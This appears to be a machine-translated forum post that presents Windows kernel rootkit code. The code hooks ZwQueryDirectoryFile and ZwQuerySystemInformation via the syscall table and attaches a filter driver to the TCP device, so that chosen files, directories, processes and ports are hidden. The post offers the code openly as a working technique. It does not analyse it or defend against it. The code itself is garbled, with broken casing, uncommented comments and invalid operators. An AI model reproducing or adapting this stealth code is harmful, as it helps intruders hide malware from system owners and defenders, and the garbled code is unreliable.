Hide any process, directory/file, registry, port

Find processes, directories/files, registry and other operating systems will eventually call Zwquerydirectoryfile,zwquerysysteminformation,zwxxxvaluekey and other functions. To intercept these functions for hidden purposes, you need to implement the above functions yourself and modify a syscall table maintained by the system to point to its predefined functions. Because the SYSCALL table is not visible at the user layer, write DRIVE can only be modified under ring 0. There is no detail about how to modify the articles that have already been introduced. (see articles written by sysinternals.com or Webcrazy). The lookup port is using a TDI query. TDI has exported two devices \\DEVICE\\TCP with \\DEVICE\\UDP. We can use the device filter-driven method to write a DRIVE to take over all the IRP packages of the two devices for processing and then to the lower drive. For the purpose of hiding any port. The method mentioned above is not new, it is the old technology which was already existed n years ago. I now put it out just to enrich the layout, irrigation. The experts still don't look. Below is my DRIVE to hide any process, directory/file, port code fragment.

(The registry operation is written in RegMon in detail and is not listed here)

typedef struct _FILETIME
{
DWORD Dwlowdatetime;
DWORD Dwhighdatetime;
}filetime;
typedef struct _DIRENTRY
{
DWORD Dwlentonext;
DWORD dwattr;
FILETIME ftcreate, ftlastaccess, Ftlastwrite;
DWORD dwunknown[2];
DWORD Dwfilesizelow;
DWORD Dwfilesizehigh;
DWORD dwunknown2[3];
WORD Wnamelen;
WORD Wunknown;
DWORD dwUnknown3;
WORD Wshortnamelen;
WCHAR swshortname[12];
WCHAR suname[1];
} direntry, *pdirentry;
struct _system_threads
{
Large_integer Kerneltime;
Large_integer Usertime;
Large_integer Createtime;
ULONG waittime;
PVOID startaddress;
client_id Clientis;
Kpriority Priority;
Kpriority basepriority;
ULONG Contextswitchcount;
ULONG ThreadState;
Kwait_reason Waitreason;
};
struct _system_processes
{
ULONG Nextentrydelta;
ULONG ThreadCount;
ULONG Reserved[6];
Large_integer Createtime;
Large_integer Usertime;
Large_integer Kerneltime;
Unicode_string ProcessName;
Kpriority basepriority;
ULONG ProcessID;
ULONG Inheritedfromprocessid;
ULONG Handlecount;
ULONG reserved2[2];
Vm_counters vmcounters;
Io_counters iocounters;
struct _system_threads threads[1];
};
Hide Directory/File
NTSTATUS Hookzwquerydirectoryfile (
In HANDLE hfile,
In HANDLE hevent OPTIONAL,
In Pio_apc_routine Ioapcroutine OPTIONAL,
In Pvoid Ioapccontext OPTIONAL,
Out Pio_status_block Piostatusblock,
Out Pvoid Fileinformationbuffer,
In ULONG Fileinformationbufferlength,
In File_information_class Fileinfoclass,
In BOOLEAN Breturnonlyoneentry,
In Punicode_string Pathmask OPTIONAL,
In BOOLEAN brestartquery)
{
NTSTATUS RC;
CHAR aprocessname[80];
Ansi_string Ansifilename,ansidirname;
Unicode_string Unifilename;
Pp_dir ptr;
WCHAR parentdirectory[1024] = {0};
int bytesreturned;
PVOID Object;
Perform the old Zwquerydirectoryfile function
Rc= ((zwquerydirectoryfile) (Oldzwquerydirectoryfile)) (Hfile,hevent,ioapcroutine,
Ioapccontext,piostatusblock,fileinformationbuffer,fileinformationbufferlength,
Fileinfoclass,breturnonlyoneentry,pathmask,brestartquery);
if (nt_success (RC))
{
Pdirentry p;
Pdirentry PLast;
BOOL Blastone;
int found;
p = (pdirentry) fileinformationbuffer; Assign the results of the lookup to the structure
PLast = NULL;

Todo
{
Blastone =! (P->dwlentonext);
Rtlinitunicodestring (&unifilename,p->suname);
Rtlunicodestringtoansistring (&ansifilename,&unifilename,true);
Rtlunicodestringtoansistring (&ansidirname,&unifilename,true);
Rtlupperstring (&ansifilename,&ansidirname);

Found=0;
Find in linked list whether or not to include the current directory
for (ptr = List_head; ptr!= NULL; ptr = ptr->next)
{
if (Ptr->flag!= ptr_hidedir) continue;
if (Rtlcomparememory (Ansifilename.buffer, Ptr->name,strlen (ptr->name)) = = strlen (ptr->name))
{
found=1;
Break
}
}//end for
If the linked list contains the current directory, hide
if (found)
{
if (Blastone)
{
if (p = = (pdirentry) fileinformationbuffer)
{
rc = 0x80000006; Hide
}
Else
Plast->dwlentonext = 0;
Break
}
Else
{
int iPos = ((ULONG) p)-(ULONG) Fileinformationbuffer;
int ileft = (DWORD) fileinformationbufferlength-ipos-p->dwlentonext;
Rtlcopymemory ((PVOID) p, (PVOID) ((char *) p + p->dwlentonext), (DWORD) ileft);
Continue
}
}
PLast = p;
p = (pdirentry) ((char *) p + p->dwlentonext);
}while (!blastone);
Rtlfreeansistring (&ansidirname);
Rtlfreeansistring (&ansifilename);
}
return (RC);
}
Hide Process
NTSTATUS Hookzwquerysysteminformation (
In ULONG Systeminformationclass,
In Pvoid SystemInformation,
In ULONG Systeminformationlength,
Out Pulong Returnlength)
{
NTSTATUS RC;
Ansi_string process_name,process_uname,process_name1,process_name2;
BOOL G_hide_proc = TRUE;
CHAR aprocessname[80];
Pp_dir ptr;
int found;
Perform the old zwquerysysteminformation function
rc = ((zwquerysysteminformation) (oldzwquerysysteminformation)) (Systeminformationclass,
Systeminformation,systeminformationlength,returnlength);
if (nt_success (RC))
{
if (G_hide_proc && (5 = systeminformationclass))
{
Assign the results of the lookup to the structure
struct _system_processes *curr = (struct _system_processes *) systeminformation;
struct _system_processes *prev = NULL;
Traversal process
while (Curr)
{
if (0 < Process_name. Length) && (255 > Process_name. Length))
{
Found=0;
Traversing a linked list
for (Ptr=list_head;ptr!=null;ptr=ptr->next)
{
if (Ptr->flag!= ptr_hideproc) continue;
if (memcmp (process_name). Buffer,ptr->name,strlen (ptr->name)) = = 0)
{
Found = 1;
}
}
To determine if a process name is hidden, overwrite the process name
while (found)
{
if (prev)
{
if (Curr->nextentrydelta)
{
Prev->nextentrydelta + + curr->nextentrydelta;
}
Else
{
Prev->nextentrydelta = 0;
}
}
Else
{
if (Curr->nextentrydelta)
{
(char *) SystemInformation + + curr->nextentrydelta;
}
Else
{
SystemInformation = NULL;
}
}
if (Curr->nextentrydelta)
((char *) Curr + = Curr->nextentrydelta);
Else
{
Curr = Null;break;
}
Traversing a linked list
Found = 0;
for (Ptr=list_head;ptr!=null;ptr=ptr->next)
{
if (Ptr->flag!= ptr_hideproc) continue;
if (memcmp (process_name). Buffer,ptr->name,strlen (ptr->name)) = = 0)
{
Found = 1;
}
}
}
}
if (Curr!= NULL)
{
prev = Curr;
if (Curr->nextentrydelta) ((char *) Curr + = Curr->nextentrydelta);
else Curr = NULL;
}
}
}
}
return (RC);
}
Hide Port
Pdevice_object M_tcpgetdevice;
Pdevice_object Tcpdevice;
Unicode_string Tcpdevicename;
Pdriver_object Tcpdriver;
Pdevice_object Tcpgetdevice;
Pdevice_object Filterdevice
Pdriver_dispatch Empty;
NTSTATUS status;
Empty = driverobject->majorfunction[irp_mj_create];
Rtlinitunicodestring (&tcpdevicename, L "\\DEVICE\\TCP");
Get the existing device pointer
Status = Iogetdeviceobjectpointer (&tcpdevicename,file_all_access,&fileobject,&tcpdevice);
if (! Nt_success (status))
{
Dbgprint ("Iogetdeviceobjectpointer error!\n");
return status;
}
Dbgprint ("Iogetdeviceobjectpointer ok!\n");
Set up a device
Status = IoCreateDevice (Driverobject,sizeof (device_extension), NULL,
File_device_unknown,0,false,&filterdevice);
if (! Nt_success (status))
{
return status;
}
Add Device
Tcpgetdevice = IoAttachDeviceToDeviceStack (Filterdevice, Tcpdevice);
if (! Tcpgetdevice)
{
Iodeletedevice (Filterdevice);
Dbgprint ("IoAttachDeviceToDeviceStack error!\n");
return status_success;
}
M_tcpgetdevice = Tcpgetdevice;
Add to the filter function to process
for (i=0;i<irp_mj_maximum_function;i++)
{
if ((Tcpdriver->majorfunction[i]!=empty) && (driverobject->majorfunction[i]==empty)
{
Driverobject->majorfunction[i] = passthrough;
}
}
Obdereferenceobject (FileObject);
NTSTATUS passthrough (in Pdevice_object deviceobject, in Pirp IRP)
{
NTSTATUS status;
Pio_stack_location Pirpstack;
Pirpstack = Iogetcurrentirpstacklocation (IRP);
If the query completes the IRP
if (Pirpstack->parameters.deviceiocontrol.iocontrolcode = = QUERY_INFORMATION_EX)
{
Here you can judge a port a step closer
irp->iostatus.status=status_success;
IoCompleteRequest (irp,io_no_increment);
return status_success;
}
Copy the current IRP
Iocopycurrentirpstacklocationtonext (IRP);
Iosetcompletionroutine (irp,genericcompletion,null,true,true,true);
Passed
Return IoCallDriver (M_tcpgetdevice, IRP);
}